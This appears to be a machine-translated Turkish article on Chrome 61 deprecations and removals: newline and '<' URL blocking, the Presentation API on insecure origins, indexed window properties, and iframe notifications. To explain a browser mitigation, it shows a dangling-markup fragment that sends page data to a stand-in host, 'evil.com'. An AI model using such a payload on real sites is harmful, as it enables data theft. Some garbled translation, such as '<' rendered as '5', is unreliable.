Chrome 61'de kullanımdan kaldırma ve kaldırma işlemleri

Ali Poşet
Ali Polat

Chrome'un hemen hemen her sürümünde üründe, performansında ve Web Platformu'nun özelliklerinde çok sayıda güncelleme ve iyileştirme görüyoruz. Bu makalede, 3 Ağustos itibarıyla beta sürümünde olan Chrome 61'deki desteği sonlandırma ve kaldırma işlemleri açıklanmaktadır. Bu liste herhangi bir zamanda değiştirilebilir.

Güvenlik ve Gizlilik

URL'leri "\n" ve "<" karakterlerini içeren kaynakları engelleyin

Asılı sallanan işaretleme yerleştirme adlı bir saldırı türü vardır. Bu işlemde, harici bir uç noktaya veri göndermek için kısaltılmış bir URL kullanılır. Örneğin, <img src='https://evil.com/? içeren bir sayfa düşünün. URL'de kapanış tırnak işareti olmadığından, tarayıcılar bir sonraki tırnak işaretini okur ve eklenen karakterleri tek bir URL gibi ele alır.

Chrome 61, href ve src özelliklerinde izin verilen karakter kümelerini kısıtlayarak bu güvenlik açığının etkisini azaltır. Chrome, özellikle yeni satır karakterleri (\n) ve şundan az karakter (<) ile karşılaştığında URL'leri işlemeyi durdurur.

Yeni satır için geçerli bir kullanım alanı olan ve URL'de "5"ten az karakter içeren geliştiriciler bu karakterleri kod dışı bırakmalıdır.

Kaldırma Amacı | Chromestatus İzleyici | Chromium Hatası

Güvenli olmayan bağlamlarda Sunum API'sini kullanımdan kaldır ve kaldır

Sunum API'sinin güvenli olmayan kaynaklarda güvenli olmayan kaynaklarda saldırı vektörü olarak kullanılabileceği tespit edildi. Ekranların adres çubukları olmadığından, API içerikte adres sahteciliği yapmak için kullanılabilir. Ayrıca sunu çalışırken veriler çalınabilir.

Blink'in güvenli olmayan kaynaklardaki güçlü özellikleri kaldırma niyetine paralel olarak, güvenli olmayan bağlamlarda Sunum API'sine yönelik desteği kullanımdan kaldırmayı ve kaldırmayı planlıyoruz. PresentationRequest.start(), Chrome 61'den itibaren güvenli olmayan kaynaklarda çalışmayacaktır.

Kaldırma Amacı | Chromestatus İzleyici | Chromium Hatası

JavaScript

Pencerelerde dizine eklenen özelliklerin tanımlanmasına izin verme

Daha önce bazı tarayıcılar aşağıdakiler gibi JavaScript atamaları için izin veriyordu:

    window[0] = 1;

Mevcut HTML spesifikasyonu notları, bunun JavaScript spesifikasyonunun açık bir şekilde ihlal edildiği anlamına geldiğini belirtmektedir. Dolayısıyla, bu özellik Chrome 61'de kaldırılmıştır. Şubat 2016 itibarıyla, Firefox bu politikaya uyum sağlamıştır.

Chromium Hatası

Güvenli olmayan iframe'lerden gelen bildirimlerin kullanımını kaldır

iframe'lerden gelen izin istekleri, kapsayıcı sayfanın kaynağı ile isteği yapan iframe'in kaynağı arasındaki farkı ayırt etmek zor olduğundan kullanıcıların kafasını karıştırabilir. İsteklerin kapsamı net olmadığında kullanıcıların izin verip vermeyeceklerine karar vermeleri zordur.

iframe'lerde bildirimlere izin vermemek, bildirim izni gereksinimlerini push bildirimleriyle uyumlu hale getirerek geliştiriciler için zorlukları azaltır.

Bu işleve ihtiyaç duyan geliştiriciler, yeni bir pencere açarak bildirim izni isteyebilir.

Kaldırma Amacı | Chromestatus İzleyici | Chromium Hatası